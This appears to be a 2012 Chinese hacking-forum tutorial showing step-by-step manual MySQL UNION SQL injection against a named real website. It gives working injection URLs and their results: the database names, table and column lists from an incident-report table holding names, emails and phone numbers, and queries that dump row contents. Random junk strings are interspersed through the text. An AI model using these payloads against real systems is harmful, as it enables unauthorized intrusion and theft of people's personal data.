中国网络渗透测试联盟

标题: .高级暴库方法讲解 [打印本页]

作者: admin    时间: 2012-9-13 17:57
标题: .高级暴库方法讲解
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询$ a7 x- x; Q3 e* X, o
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
, Q' ]$ a( g! C# {# n1 A* o# Zhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
/ i. D/ h1 d* |5 n3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--$ X0 Q! h1 X" Y8 R% I
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
8 C1 N; g4 D8 M5 W2 H; r4.判断有没有写权限. q( q# x3 X6 Q8 f
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限% F  x( J5 W0 V0 v* z+ Z
没办法,手动猜表啦
9 k# b  j( V+ q5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
  k* r% F  a% ~8 p2 O* M, h: J! W但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下$ N( g( Q8 A) b' q, A7 [
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
: t7 A* d; j: V* l; G成功查出所有数据库,国外的黑客就是不一般。数据库如下:0 M+ ?. M( H. n2 q0 `& c  O/ t% L
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
* a7 C/ ~; E! W7 `1 ?) I6.爆表,爆的是twcert库
& I/ t& @5 l2 g+ L" mhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
. p2 Y+ f, C% O" V1 E8 H" U' W爆出如下表' d' i. p/ w( D1 F8 V* n  T
downloadfile,irsys,newsdata,secrpt,secrpt_big5
+ I5 h0 U6 c; k0 w% V/ Q% ]( O0 C7.爆列名,这次爆的是irsys表+ _0 `$ U/ {9 s% T, _) |9 O
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--- c7 Z* j; a1 C+ Y8 N% b$ W
爆出如下列( i& ^0 j$ [% J- H$ a
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
5 R* s' `: x/ z4 j& g$ H8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
4 r9 E( @8 j3 K. P1 t; I: M! Lhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
/ u$ T4 `' N. B+ @# P- g返回是3,说明每个列里有3个地段
6 D  @+ t  S! `' {4 L  e9.爆字段内容- a% L" i5 a. s% s7 t
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
  o9 m; s3 d  L& x% G) J  V2 t爆出name列的第一个字段的内容6 R8 F4 q1 Q' s8 [' H
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
. {. s7 @- k; M5 r5 B7 y' b+ q6 I爆出name列的第二个字段的内容




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2